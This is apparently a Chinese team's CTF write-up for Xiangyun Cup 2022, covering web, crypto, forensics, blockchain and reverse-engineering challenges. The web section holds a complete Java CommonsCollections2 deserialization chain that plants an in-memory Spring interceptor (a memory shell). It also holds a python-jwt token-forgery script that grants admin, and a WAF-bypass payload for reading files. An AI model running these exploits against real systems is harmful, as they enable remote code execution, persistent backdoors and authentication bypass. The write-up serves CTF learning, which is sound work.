祥云杯 2022 By W&M


祥云杯 2022 By W&M

WEB

ezjava

非预期直接CC2。打内存马

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.ibatis.javassist.ClassClassPath;
import org.apache.ibatis.javassist.ClassPool;
import org.apache.ibatis.javassist.CtClass;

/**
 * Generates a serialized {@link PriorityQueue} carrying the CommonsCollections "CC2"
 * gadget chain and prints it Base64-encoded.
 *
 * <p>What the code below wires together: the queue's comparator is a commons-collections4
 * {@link TransformingComparator} wrapping an {@code InvokerTransformer("newTransformer")},
 * and the queue holds a {@link TemplatesImpl} whose {@code _bytecodes} field is the class
 * file of {@link g}. When a JVM deserializes the queue, {@code PriorityQueue.readObject}
 * re-heapifies its elements, which calls the comparator, which reflectively calls
 * {@code TemplatesImpl.newTransformer()}, which defines and instantiates the embedded
 * class — so {@code g}'s static initializer runs on the deserializing side.
 *
 * <p>Defensive notes: this only works where an application feeds attacker-controlled bytes
 * to {@code ObjectInputStream} and has commons-collections4 on the classpath. An
 * {@code ObjectInputFilter} allow-list (JEP 290), or not using native Java serialization for
 * untrusted input at all, stops it; commons-collections4 4.1+ also refuses to deserialize
 * {@code InvokerTransformer} unless unsafe serialization is explicitly enabled.
 */
public class CommonCollection2 {
    /**
     * Builds the gadget queue and prints its serialized form as Base64 on stdout.
     *
     * @param args unused
     * @throws Exception any reflection or javassist failure is propagated; serialization
     *         failures are caught and printed instead
     */
    public static void main(String[] args) throws Exception {
        // The single-String constructor is presumably not public (hence setAccessible);
        // with one argument it means "invoke <methodName>() with no arguments on the input".
        Constructor constructor = Class.forName("org.apache.commons.collections4.functors.InvokerTransformer")
                .getDeclaredConstructor(String.class);
        constructor.setAccessible(true);
        InvokerTransformer transformer = (InvokerTransformer) constructor.newInstance("newTransformer");

        ClassPool pool = ClassPool.getDefault();
        // Let javassist resolve AbstractTranslet, the superclass of g, when loading g.
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));


        // getDefault() returns the same singleton as `pool`, so the class path added above applies.
        byte[] bytes = ClassPool.getDefault().get(g.class.getName()).toBytecode();
        byte[][] targetByteCodes = new byte[][]{bytes};
        // Class.newInstance() is deprecated since Java 9; fine on the Java 8 this targets.
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        // _bytecodes: the class defined when newTransformer() runs.
        // _name: must be non-null, otherwise getTransletInstance() returns early.
        // _class: null forces defineTransletClasses() to actually load _bytecodes.
        setFieldValue(templates, "_bytecodes", targetByteCodes);
        setFieldValue(templates, "_name", "name");
        setFieldValue(templates, "_class", null);

        TransformingComparator comparator = new TransformingComparator(transformer);
        PriorityQueue queue = new PriorityQueue(1);

        // The queue is filled through reflection rather than add(): add() would run the
        // comparator (and thus the gadget) right here. Two elements plus size=2 are needed
        // so that readObject()'s heapify has something to compare on the target side.
        Object[] queue_array = new Object[]{templates, 1};
        Field queue_field = Class.forName("java.util.PriorityQueue").getDeclaredField("queue");
        queue_field.setAccessible(true);
        queue_field.set(queue, queue_array);

        Field size = Class.forName("java.util.PriorityQueue").getDeclaredField("size");
        size.setAccessible(true);
        size.set(queue, 2);

        // The comparator is serialized with the queue and is what readObject() invokes.
        Field comparator_field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        comparator_field.setAccessible(true);
        comparator_field.set(queue, comparator);

        try {
   /*         ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc2"));
            outputStream.writeObject(queue);
            outputStream.close();*/
            // Serialize to memory and print; the commented-out lines above/below are a
            // file-based variant and a local round-trip check (which would fire the gadget locally).
            ByteArrayOutputStream btout = new ByteArrayOutputStream();
            ObjectOutputStream objOut = new ObjectOutputStream(btout);
            objOut.writeObject(queue);
            byte[] serialized = btout.toByteArray();
            System.out.println(Base64.getEncoder().encodeToString(serialized));
            //ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc2"));
            //inputStream.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }

    }

    /**
     * Sets a field by name on {@code obj}, including private and inherited fields.
     *
     * @param obj       target instance
     * @param fieldName declared field name, searched up the class hierarchy
     * @param value     new value
     * @throws Exception reflection failures; note that {@link #getField} returns null when
     *                   the field does not exist anywhere, which surfaces here as a
     *                   NullPointerException
     */
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    /**
     * Looks up a declared field in {@code clazz} or, failing that, in its superclasses.
     *
     * @param clazz     class to start the search at
     * @param fieldName declared field name
     * @return the accessible field, or null if no class in the hierarchy declares it
     */
    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            // Not declared here: recurse into the superclass (stops at Object, whose superclass is null).
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }
}
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.util.Base64Utils;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;

import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
/**
 * Payload class embedded in the CC2 gadget: a no-op {@link AbstractTranslet} whose static
 * initializer — run when {@code TemplatesImpl} instantiates it — registers an in-memory
 * Spring MVC interceptor built from Base64-encoded bytecode.
 *
 * <p>Defensive notes: nothing on disk changes, so detection has to inspect the live JVM,
 * e.g. enumerate the interceptors of {@code requestMappingHandlerMapping} (or a heap dump)
 * for a class that no jar on the classpath defines. The root cause is the deserialization
 * sink that instantiates this class, not Spring itself.
 */
public class g extends AbstractTranslet {
    // Runs once, on class initialization. Each checked exception is caught and printed;
    // an uncaught one would surface as ExceptionInInitializerError in the caller.
    static {
        try {
            printName();
        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        } catch (InvocationTargetException e) {
            e.printStackTrace();
        } catch (NoSuchMethodException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        } catch (InstantiationException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    /**
     * Defines the controller class from its Base64-encoded class file and appends an
     * instance of it to the running DispatcherServlet's handler-mapping interceptors.
     *
     * @throws NoSuchMethodException     reflection lookup failed
     * @throws InvocationTargetException defineClass threw (e.g. malformed class file)
     * @throws IllegalAccessException    reflective access denied
     * @throws NoSuchFieldException      Spring internals differ from the expected layout
     * @throws ClassNotFoundException    the freshly defined class cannot be loaded back
     * @throws InstantiationException    the controller class has no usable constructor
     * @throws IOException               declared but not thrown by the visible code
     */
    public static void printName() throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, NoSuchFieldException, ClassNotFoundException, InstantiationException, IOException {
        // Must match the name stored in the class file being defined.
        String className = "GuokeController";
        // Base64 of the controller's class file (the literal is redacted on this page).
        byte[] bytes = Base64Utils.decodeFromString("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");
        // bytecode of the controller
        // NOTE(review): this is the loader of the *current thread's class*, not the thread's
        // context class loader. For a plain java.lang.Thread that is null (bootstrap) and the
        // invoke below would fail on a null receiver; presumably it relies on the container's
        // worker-thread subclass being loaded by the application loader — confirm.
        ClassLoader classLoader = Thread.currentThread().getClass().getClassLoader();
        // ClassLoader.defineClass is protected, hence the reflective call. On newer JDKs
        // strong encapsulation blocks this without --add-opens.
        Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        method.setAccessible(true);
        method.invoke(classLoader, className, bytes, 0, bytes.length);
        // The DispatcherServlet exposes its WebApplicationContext as a request attribute;
        // scope 0 is RequestAttributes.SCOPE_REQUEST.
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping) context.getBean("requestMappingHandlerMapping");
        // Private list consulted when the handler execution chain is built; appending here
        // makes the new object participate in every subsequent dispatch.
        Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        field.setAccessible(true);
        ArrayList<Object> adaptedInterceptors = (ArrayList<Object>) field.get(abstractHandlerMapping);
        // The defined class is expected to be a HandlerInterceptor; nothing here checks that
        // (the list is handled as ArrayList<Object>).
        adaptedInterceptors.add(classLoader.loadClass(className).newInstance());
    }

    // Required by AbstractTranslet; intentionally empty — the work happens in the static initializer.
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    // Required by AbstractTranslet; intentionally empty.
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

FunWEB

jwt的一个cve

https://github.com/davedoesdev/python-jwt/blob/master/test/vulnerability_vows.py
import json
from json import loads, dumps
import requests
import re
from jwcrypto.common import base64url_decode, base64url_encode
# Log in with throwaway credentials to obtain a token signed by the server; the
# proxies entry only routes the request through a local intercepting proxy.
topic=requests.post(url="http://eci-2zegk71yvywhykjxwuv8.cloudeci1.ichunqiu.com/signin",proxies={"http":"http://127.0.0.1:8080"},headers = {'Content-Type': 'application/json'},data=json.dumps({"username":"1","password":"1"}))
res=topic.headers
# Extract the token from the Set-Cookie header (the headers object is stringified
# and searched). NOTE(review): .group(1) raises AttributeError when no "token=...;"
# cookie comes back, e.g. if the login is rejected.
jwttoken=re.search("token=(.*?);",str(res),re.I|re.M).group(1)
[header, payload, signature] = jwttoken.split('.')
# Build a modified payload claiming admin; it carries no valid signature.
parsed_payload = loads(base64url_decode(payload))
parsed_payload["is_admin"]=1
fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
# A JSON-serialization JWS whose protected/payload/signature members are the genuine
# token, with an extra member (key beginning with two spaces) that embeds a compact
# token using the modified payload. Per the linked vulnerability_vows.py, an affected
# python-jwt presumably verifies the genuine members but decodes the other; the fixed
# library rejects this form. Defensive rule: accept only compact-form tokens and
# decode exactly the bytes that were verified.
token=('{"  ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}')
print(token)

替换token

祥云杯 2022 By W&M

祥云杯 2022 By W&M

登录拿到flag

RustWaf

接受POST。然后通过rust-waf。返回值会经过json.parse。然后读文件

readfile随便post一个。

字符串不能包含flag和proc。并且会用rust的json去解析。

如果解析失败直接就返回字符串。然后再经过nodejs的js解析。

根据https://ctftime.org/writeup/35075得到大致的payload

file[href]=a&file[origin]=a&file[protocol]=file:&file[hostname]=&file[pathname]=/app/fl%2561g.txt

大致可以想到。构造一个json字符串。让rust解析失败。返回字符串。再经过nodejs的json正常解析。

最后读取文件

{"href":"a","origin":"a","pathname":"/fl%61g","hostname":"","protocol":"file:","a":1e+5000000000000}

Crypto

tracing

正常的RSA,但是给了gcd的脚本运行过程,根据结果逆向回去得到phi

import re

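# Running state for the reverse replay of the gcd trace: (a, b) is the operand pair
# being reconstructed, flag counts halvings logged but not yet undone. s is unused.
s, a, b = 0, 1, 0
flag = 0

def solve(cmd):
    """Undo one line of the recorded gcd trace.

    Each trace line carries a step number in parentheses, e.g. ``(12)``; the
    number selects one reversible operation on the module-level pair
    ``(a, b)``. Feeding the log backwards (see the caller) rebuilds the
    original operands, which the writeup uses as ``phi`` and ``e``.

    Side effects: updates the globals ``a``, ``b`` and ``flag``. Lines with
    no parenthesised number are ignored. An unrecognised step number prints
    the offending line and raises ``SystemExit`` because every later
    reconstruction step would be wrong.
    """
    global s, a, b, flag
    # Raw string: "\(" and "\d" are invalid escapes in a plain literal
    # (SyntaxWarning on 3.12+).
    pos = re.findall(r"\(\d+\)", cmd)
    if not pos:
        return
    pos = int(pos[0][1:-1])
    if pos in (12, 16, 21):
        # Swap steps undo themselves by swapping back.
        a, b = b, a
    elif pos == 34:
        # A halving was logged; it is undone by the next 10/19/14 step.
        flag += 1
    elif pos == 10 and flag:
        a <<= 1
        flag -= 1
    elif pos == 19 and flag:
        a <<= 1
        flag -= 1
        # Sanity checks on parity: these hold only if the replay is consistent.
        assert a & 1 == 0
        assert b & 1 == 1
        assert flag == 0
    elif pos == 14 and flag:
        b <<= 1
        flag -= 1
        assert a & 1 == 1
        assert b & 1 == 0
        assert flag == 0
    elif pos == 9:
        # Forward step was a subtraction a - b; undo by adding b back.
        a += b
        assert a & 1 == 1
        assert b & 1 == 1
        assert flag == 0
    elif pos in (11, 31, 8, 7, 6, 20, 18, 15, 5):
        pass  # bookkeeping lines with no effect on (a, b)
    else:
        print(pos, flag, cmd[:-1])
        print('ERROR')
        # raise SystemExit rather than the site-provided exit() builtin, which is
        # absent under `python -S` and in embedded interpreters.
        raise SystemExit(0)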

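# Read the recorded gcd trace; the context manager closes the file even if
# readlines() raises (the original left it open on that path).
with open("out.out", "r") as f:
    data = f.readlines()
# Replay backwards: the last logged step is the first one to undo.
for i in data[::-1]:
    solve(i)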

from Crypto.Util.number import *
# Ciphertext and modulus as given by the challenge.
c = 64885875317556090558238994066256805052213864161514435285748891561779867972960805879348109302233463726130814478875296026610171472811894585459078460333131491392347346367422276701128380739598873156279173639691126814411752657279838804780550186863637510445720206103962994087507407296814662270605713097055799853102
n = 113793513490894881175568252406666081108916791207947545198428641792768110581083359318482355485724476407204679171578376741972958506284872470096498674038813765700336353715590069074081309886710425934960057225969468061891326946398492194812594219890553185043390915509200930203655022420444027841986189782168065174301
# After the reverse replay, `a` holds the reconstructed totient and `b` the public exponent.
phi = a
e = b
# Textbook RSA: private exponent, then m = c^d mod n.
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag)

fermat

obfuscate写了一大堆看不懂的东西,反正就是类似于在p的基础上加一个数得到q,本地测试之后发现A很小,直接费马分解做掉,x根据威尔逊定理选p-1即可

from Crypto.Util.number import *
from gmpy2 import *

# Challenge parameters: modulus and ciphertext.
n = 141321067325716426375483506915224930097246865960474155069040176356860707435540270911081589751471783519639996589589495877214497196498978453005154272785048418715013714419926299248566038773669282170912502161620702945933984680880287757862837880474184004082619880793733517191297469980246315623924571332042031367393
c = 81368762831358980348757303940178994718818656679774450300533215016117959412236853310026456227434535301960147956843664862777300751319650636299943068620007067063945453310992828498083556205352025638600643137849563080996797888503027153527315524658003251767187427382796451974118362546507788854349086917112114926883

# The two primes were recovered with Fermat's factorisation; they differ only in
# their low digits, which is why that method works immediately.
p = 11887853772894265642834649929578157180848240939084164222334476057487485972806971092902627112665734648016476153593841839977704512156756634066593725142934001
q = 11887853772894265642834649929578157180848240939084164222334476057487485972806971092902627112665734646483980612727952939084061619889139517526028673988305393

# x = p - 1 satisfies the challenge's check because base**(p-1) == 1 (mod p) for any
# base not divisible by p (Fermat's little theorem).
x = p - 1
assert pow(114514, x, p) == 1

e = 65537
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
# Decrypt, then strip the x**2 mask the challenge XORed onto the plaintext.
plain = pow(c, d, n) ^ (x ** 2)
flag = long_to_bytes(plain)
print(flag)

MISC

BearParser

虽然是私链,但是每个队伍部署的合约都一样,所以可以拿其他队伍做题的calldata重放到自己队伍部署的合约,蹭车。

  1. 在有其他队伍做出来题目后,爬取区块,找到做出来题目的队伍调用题目合约时传入的calldata,直接拿过来用。

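    //https://web3playground.io/
    // connect MetaMask, then run this in the F12 console
    // Scan every mined block and print "<block> <calldata>" for each transaction that
    // carries calldata and emitted at least one event. One receipt lookup per candidate
    // transaction, so this is slow on long chains. (It is useful here only because the
    // challenge contract does not bind a call to its sender; a per-team contract should
    // check msg.sender or use a nonce so calldata cannot simply be replayed.)
    // The chain height is read once; rerun to pick up blocks mined since.
    const latest = await web3.eth.getBlockNumber();
    for (let i = 1; i < latest; i++) {
        const block = await web3.eth.getBlock(i, true);
        for (const transaction of block.transactions) {
            // Skip transactions with no calldata before paying for the receipt lookup.
            if (!transaction.input || transaction.input === "0x") continue;
            const receipt = await web3.eth.getTransactionReceipt(transaction.hash);
            // Receipt can be null for transactions not yet mined; guard before reading logs.
            if (receipt && receipt.logs[0]) {
                console.log("" + i + " " + transaction.input);
            }
        }
    }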
    190 0x26ad15930000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000008061616161616161616161616161616161616161616161616161616161616161616262626262626262626262626262626262626262626262626262626262626262000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000001111111100000000000000000000000000000000000000000000000000000000111111110000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000278780000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000006fb9eccc000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000027878000000000000000000000000000000000000000000000000000000000000
  2. remix ide新建一个空合约 必须有fallback函数 否则remix计算不出gas。编译,不需要部署

    /// Empty helper contract: Remix needs a fallback to estimate gas for a raw
    /// "low level interaction", so this is compiled but never deployed.
    contract xiangyun {
        /// Accepts any calldata and does nothing.
        fallback() external {}
    }
  3. 部署页面 At Address添加题目部署的合约 下面Low level interactions直接把爬取到的calldata填进去 执行

    祥云杯 2022 By W&M

把transaction hash填到题目里得到flag。

祥云杯 2022 By W&M

strange_forensics

下载了附件,同时根据题目描述得知,最终的flag由3段flag合起来,那么winhex打开搜了一下flag,发现有flag3的字眼,同时要符合题目描述说的最后带.

祥云杯 2022 By W&M

然后同样在winhex里面搜了一下镜像版本,发现是一个ubuntu18.04的系统:

祥云杯 2022 By W&M

那么就知道是一个linux的内存取证,但是profile需要自己制作。

参考这篇文章:https://www.modb.pro/db/225668 可知我们只需要把内核system.map文件和 module.dwarf文件打包成一个zip文件即可。

我们先下载了一个ubuntu18.04的虚拟机,查看内核发现刚好一模一样:

祥云杯 2022 By W&M

然后先下载了volatility,然后在/volatility/tools/linux 下执行make命令,即可得到module.dwarf(其中应该是会因为环境问题,有一些报错,是缺少部分环境,需自行去安装一下)

然后将上面得到的module.dwarf和system.map放在一起打包为ZIP文件,就是我们需要的profile文件:

祥云杯 2022 By W&M

然后再将制作好的ZIP文件放置volatility/plugins/overlays/linux/目录下,通过volatility --info查看,就可以看到我们配置好的profile文件了:

祥云杯 2022 By W&M

祥云杯 2022 By W&M

然后就是照例用linux_bash看了下bash历史记录和linux_psaux看了下进程和完整的命令行和开始时间:

通过linux_bash可以发现有个bob的用户:

祥云杯 2022 By W&M

通过linux_psaux可以看到最后有个/home/bob/Desktop/secret.zip

祥云杯 2022 By W&M

那么再使用linux_find_file列出这个文件,并尝试恢复文件:

 python2.7 vol.py -f '/home/l1near/Desktop/1.mem'  --profile=Linuxubuntu18_04x64 linux_find_file -F "/home/bob/Desktop/secret.zip"

祥云杯 2022 By W&M

python2.7 vol.py -f '/home/l1near/Desktop/1.mem'  --profile=Linuxubuntu18_04x64 linux_find_file -i 0xffff97ce37a94568 -O /home/l1near/Desktop/secret.zip

提取出文件,发现文件打开报错,直接把数据区inflate也不对,所以怀疑是加密位出现了问题,修改了一下从00改成09,然后用archpr爆破可以得到密码为123456,从而得到flag2:flag2 is _y0u_Ar3_tHe_LIn

同样的操作,去找到并提取了/etc/shadow文件

python2.7 vol.py -f '/home/l1near/Desktop/1.mem'  --profile=Linuxubuntu18_04x64 linux_find_file -F "/etc/shadow"

python2.7 vol.py -f '/home/l1near/Desktop/1.mem'  --profile=Linuxubuntu18_04x64 linux_find_file -i 0xffff97ce7444b448 -O /home/l1near/Desktop/shadow

找到bob用户的密码:

祥云杯 2022 By W&M

cmd5找了下,发现能解出来,即为flag1

最后3段拼一起即为最后的flag

lena

解混淆

得到二维码扫描得到flag

祥云杯 2022 By W&M

RE

engtom

题目给了一个snapshot,通过信息收集知道快照是jerryscript的字节码状态

祥云杯 2022 By W&M

git一份jerryscript项目下来,直接使用是不能dump出字节码的,我们需要在build时候设置一些参数

祥云杯 2022 By W&M

cmake . -DJERRY_SNAPSHOT_EXEC=ON -DJERRY_ERROR_MESSAGES=ON -DJERRY_DEBUGGER=ON       -DJERRY_LINE_INFO=ON  -DJERRY_PARSER_DUMP_BYTE_CODE=ON -DJERRY_REGEXP_DUMP_BYTE_CODE=ON -DJERRY_LOGGING=ON

得到编译好的jerry,带上参数dump字节码

./jerry --show-opcodes --exec-snapshot chall.snapshot

贴上字节码

Byte code dump:

  Maximum stack depth: 38
  Flags: [small_lit_enc]
  Argument range end: 0
  Register range end: 5
  Identifier range end: 30
  Const literal range end: 91
  Literal range end: 101

   0 : CBC_CHECK_VAR ident:5->string(SboxTable)
   2 : CBC_CHECK_VAR ident:6->string(CK)
   4 : CBC_CHECK_VAR ident:7->string(FK)
   6 : CBC_CHECK_VAR ident:8->string(bigxor)
   8 : CBC_CHECK_VAR ident:9->string(leftshift)
  10 : CBC_CHECK_VAR ident:10->string(prefixInteger)
  12 : CBC_CHECK_VAR ident:11->string(sm4Sbox)
  14 : CBC_CHECK_VAR ident:12->string(GET_ULONG_BE)
  16 : CBC_CHECK_VAR ident:13->string(PUT_ULONG_BE)
  18 : CBC_CHECK_VAR ident:14->string(sm4_getkey)
  20 : CBC_CHECK_VAR ident:15->string(encrypt)
  22 : CBC_CHECK_VAR ident:16->string(decrypt_sm4)
  24 : CBC_CHECK_VAR ident:17->string(compare_array)
  26 : CBC_CHECK_VAR ident:18->string(input)
  28 : CBC_CHECK_VAR ident:19->string(num)
  30 : CBC_CHECK_VAR ident:20->string(message)
  32 : CBC_CHECK_VAR ident:21->string(count)
  34 : CBC_CHECK_VAR ident:22->string(pad_len)
  36 : CBC_CREATE_VAR_EVAL ident:5->string(SboxTable)
  38 : CBC_CREATE_VAR_EVAL ident:6->string(CK)
  40 : CBC_CREATE_VAR_EVAL ident:7->string(FK)
  42 : CBC_CREATE_VAR_FUNC_EVAL lit:91 ident:8->string(bigxor)
  45 : CBC_CREATE_VAR_FUNC_EVAL lit:92 ident:9->string(leftshift)
  48 : CBC_CREATE_VAR_FUNC_EVAL lit:93 ident:10->string(prefixInteger)
  51 : CBC_CREATE_VAR_FUNC_EVAL lit:94 ident:11->string(sm4Sbox)
  54 : CBC_CREATE_VAR_FUNC_EVAL lit:95 ident:12->string(GET_ULONG_BE)
  57 : CBC_CREATE_VAR_FUNC_EVAL lit:96 ident:13->string(PUT_ULONG_BE)
  60 : CBC_CREATE_VAR_FUNC_EVAL lit:97 ident:14->string(sm4_getkey)
  63 : CBC_CREATE_VAR_FUNC_EVAL lit:98 ident:15->string(encrypt)
  66 : CBC_CREATE_VAR_FUNC_EVAL lit:99 ident:16->string(decrypt_sm4)
  69 : CBC_CREATE_VAR_FUNC_EVAL lit:100 ident:17->string(compare_array)
  72 : CBC_CREATE_VAR_EVAL ident:18->string(input)
  74 : CBC_CREATE_VAR_EVAL ident:19->string(num)
  76 : CBC_CREATE_VAR_EVAL ident:20->string(message)
  78 : CBC_CREATE_VAR_EVAL ident:21->string(count)
  80 : CBC_CREATE_VAR_EVAL ident:22->string(pad_len)
  82 : CBC_PUSH_LITERAL ident:23->string(Array)
  84 : CBC_NEW0
  85 : CBC_ASSIGN_SET_IDENT ident:5->string(SboxTable)
  87 : CBC_PUSH_LITERAL_PUSH_NUMBER_0 ident:5->string(SboxTable)
  89 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:214
  92 : CBC_PUSH_NUMBER_POS_BYTE number:144
  94 : CBC_PUSH_NUMBER_POS_BYTE number:233
  96 : CBC_PUSH_NUMBER_POS_BYTE number:254
  98 : CBC_PUSH_NUMBER_POS_BYTE number:204
 100 : CBC_PUSH_NUMBER_POS_BYTE number:225
 102 : CBC_PUSH_NUMBER_POS_BYTE number:61
 104 : CBC_PUSH_NUMBER_POS_BYTE number:183
 106 : CBC_PUSH_NUMBER_POS_BYTE number:22
 108 : CBC_PUSH_NUMBER_POS_BYTE number:182
 110 : CBC_PUSH_NUMBER_POS_BYTE number:20
 112 : CBC_PUSH_NUMBER_POS_BYTE number:194
 114 : CBC_PUSH_NUMBER_POS_BYTE number:40
 116 : CBC_PUSH_NUMBER_POS_BYTE number:251
 118 : CBC_PUSH_NUMBER_POS_BYTE number:44
 120 : CBC_PUSH_NUMBER_POS_BYTE number:5
 122 : CBC_NEW byte_arg:16
 124 : CBC_ASSIGN_BLOCK
 125 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:1
 128 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:43
 131 : CBC_PUSH_NUMBER_POS_BYTE number:103
 133 : CBC_PUSH_NUMBER_POS_BYTE number:154
 135 : CBC_PUSH_NUMBER_POS_BYTE number:118
 137 : CBC_PUSH_NUMBER_POS_BYTE number:42
 139 : CBC_PUSH_NUMBER_POS_BYTE number:190
 141 : CBC_PUSH_NUMBER_POS_BYTE number:4
 143 : CBC_PUSH_NUMBER_POS_BYTE number:195
 145 : CBC_PUSH_NUMBER_POS_BYTE number:170
 147 : CBC_PUSH_NUMBER_POS_BYTE number:68
 149 : CBC_PUSH_NUMBER_POS_BYTE number:19
 151 : CBC_PUSH_NUMBER_POS_BYTE number:38
 153 : CBC_PUSH_NUMBER_POS_BYTE number:73
 155 : CBC_PUSH_NUMBER_POS_BYTE number:134
 157 : CBC_PUSH_NUMBER_POS_BYTE number:6
 159 : CBC_PUSH_NUMBER_POS_BYTE number:153
 161 : CBC_NEW byte_arg:16
 163 : CBC_ASSIGN_BLOCK
 164 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:2
 167 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:156
 170 : CBC_PUSH_NUMBER_POS_BYTE number:66
 172 : CBC_PUSH_NUMBER_POS_BYTE number:80
 174 : CBC_PUSH_NUMBER_POS_BYTE number:244
 176 : CBC_PUSH_NUMBER_POS_BYTE number:145
 178 : CBC_PUSH_NUMBER_POS_BYTE number:239
 180 : CBC_PUSH_NUMBER_POS_BYTE number:152
 182 : CBC_PUSH_NUMBER_POS_BYTE number:122
 184 : CBC_PUSH_NUMBER_POS_BYTE number:51
 186 : CBC_PUSH_NUMBER_POS_BYTE number:84
 188 : CBC_PUSH_NUMBER_POS_BYTE number:11
 190 : CBC_PUSH_NUMBER_POS_BYTE number:67
 192 : CBC_PUSH_NUMBER_POS_BYTE number:237
 194 : CBC_PUSH_NUMBER_POS_BYTE number:207
 196 : CBC_PUSH_NUMBER_POS_BYTE number:172
 198 : CBC_PUSH_NUMBER_POS_BYTE number:98
 200 : CBC_NEW byte_arg:16
 202 : CBC_ASSIGN_BLOCK
 203 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:3
 206 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:228
 209 : CBC_PUSH_NUMBER_POS_BYTE number:179
 211 : CBC_PUSH_NUMBER_POS_BYTE number:28
 213 : CBC_PUSH_NUMBER_POS_BYTE number:169
 215 : CBC_PUSH_NUMBER_POS_BYTE number:201
 217 : CBC_PUSH_NUMBER_POS_BYTE number:8
 219 : CBC_PUSH_NUMBER_POS_BYTE number:232
 221 : CBC_PUSH_NUMBER_POS_BYTE number:149
 223 : CBC_PUSH_NUMBER_POS_BYTE number:128
 225 : CBC_PUSH_NUMBER_POS_BYTE number:223
 227 : CBC_PUSH_NUMBER_POS_BYTE number:148
 229 : CBC_PUSH_NUMBER_POS_BYTE number:250
 231 : CBC_PUSH_NUMBER_POS_BYTE number:117
 233 : CBC_PUSH_NUMBER_POS_BYTE number:143
 235 : CBC_PUSH_NUMBER_POS_BYTE number:63
 237 : CBC_PUSH_NUMBER_POS_BYTE number:166
 239 : CBC_NEW byte_arg:16
 241 : CBC_ASSIGN_BLOCK
 242 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:4
 245 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:71
 248 : CBC_PUSH_NUMBER_POS_BYTE number:7
 250 : CBC_PUSH_NUMBER_POS_BYTE number:167
 252 : CBC_PUSH_NUMBER_POS_BYTE number:252
 254 : CBC_PUSH_NUMBER_POS_BYTE number:243
 256 : CBC_PUSH_NUMBER_POS_BYTE number:115
 258 : CBC_PUSH_NUMBER_POS_BYTE number:23
 260 : CBC_PUSH_NUMBER_POS_BYTE number:186
 262 : CBC_PUSH_NUMBER_POS_BYTE number:131
 264 : CBC_PUSH_NUMBER_POS_BYTE number:89
 266 : CBC_PUSH_NUMBER_POS_BYTE number:60
 268 : CBC_PUSH_NUMBER_POS_BYTE number:25
 270 : CBC_PUSH_NUMBER_POS_BYTE number:230
 272 : CBC_PUSH_NUMBER_POS_BYTE number:133
 274 : CBC_PUSH_NUMBER_POS_BYTE number:79
 276 : CBC_PUSH_NUMBER_POS_BYTE number:168
